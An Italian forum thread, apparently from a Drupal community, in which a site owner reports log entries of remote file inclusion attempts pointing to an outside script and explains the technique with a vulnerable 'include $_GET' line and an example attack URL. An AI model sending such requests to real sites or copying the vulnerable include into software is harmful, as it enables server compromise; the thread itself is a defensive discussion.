Credo che mi stiano attaccando il sito da più parti del mondo cercando di eseguire questo script: http://tinypath.com/sdy/test/iso.txt
Il forum mi impedisce di postare il codice, per cui l'ho messo sul mio sito direttamente all'indirizzo: http://www.diegobelotti.com/?q=node/41. Ecco il contenuto della pagina o almeno quello che sono riuscito a scoprire. A qualcuno dice qualcosa? Stanno cercando di sfruttare qualche vulnerabilità (o presunta tale) di drupal?
Attendo commenti! grazie in anticipo.
Scusa ma il codice che vedo dove è posizionato??
Ti attaccano in che modo??
Cerca di essere più preciso che potrebbe essee interessante!!
Ciao
Uccio
Il mio sito con drupal
Hai ragione, ecco la spiega.
Trovo nei log di drupal tentativi di apertura di pagine inesistenti come ad esempio:
http://www.diegobelotti.com/?q=taxonomy/term/Core.php?BEAUT_PATH=http://...?
o molto simili, ma che finiscono sempre con http://tinypath.com/sdy/test/iso.txt
Io lo ho interpretato come un tentativo di eseguire il codice iso.txt sul mio server.. sbaglio?
Purtroppo non ho ancora avuto modo di analizzare cosa dovrebbe fare lo script, per mancanza di tempo, appena posso poi riposto un commento.
Ciao e grazie
>>Io lo ho interpretato come un tentativo di eseguire il codice iso.txt >>sul mio server.. sbaglio?
I server web (IIS e Apache) sanno a priori cosa fare di un certo tipo di file.
Per i TXT l'azione è spedisci!! qundi niente esecuzione del codice; per sicurezza in caso di indecisione il server spedisce non eseguendo il contenuto!! (pensa ai file exe perche il server te li spedisce e non li esegue???)
Sperando di essere stato chiaro ed aver sfatato un'idea strana...
Ciao
Uccio
Il mio sito con drupal
Giusta la tua osservazione e sono concetti già stra-noti anche per me, però quello che pensavo è un po' diverso.
Ipotizziamo che in uno script PHP sul tuo server (per ipotesi test.php) ci sia la seguente riga:
include $_GET['pagina'];
Io metto sul mio server un file che chiamerò malevolo.txt contenete del codice PHP comprese le intestazioni:
Adesso mi collego al tuo sito e richiamo l'indirizzo:
www.tuosito.it/test.php?pagina=http%3A%2F%2Fwww.diegobelotti.com%2Fmalev...Qui _sì_, che il mio server interpreta il TXT come tale e manda tutto il contenuto al tuo script PHP che invece lo interpreta e lo esegue.
Questo è vero solo in alcune condizioni di settaggio poco sicure, ma è una tecnica che è gia stata utilizzata.
Se il file malevolo avesse estensione PHP, verrebbe eseguito sul mio server e il risultato mandato al tuo, senza creare nessun problema...
Se non ci credi prova pure...
Grazie comunque dell'interessamento!
Ma è un'ipotesi complessa che nel software Open è più complessa realiazzare, troppi leggono il sorgente ed anche i sorgenti dei moduli sono pubblici, un "Furbo" con una tecnica del genere si riceve solo insulti!!
In linea di massima la paranoia non fa mai male quindi vedi come prosegue e se capita qualcosa!!
Ti consiglio inoltre di iscriverti alla Ml-Security di drupal dove segnalano i Bug critici, al momento sulla 4.7.4 c'è un sql injection!!
Uccio
Il mio sito con drupal
lo faccio subito grazie.
Alla prossima!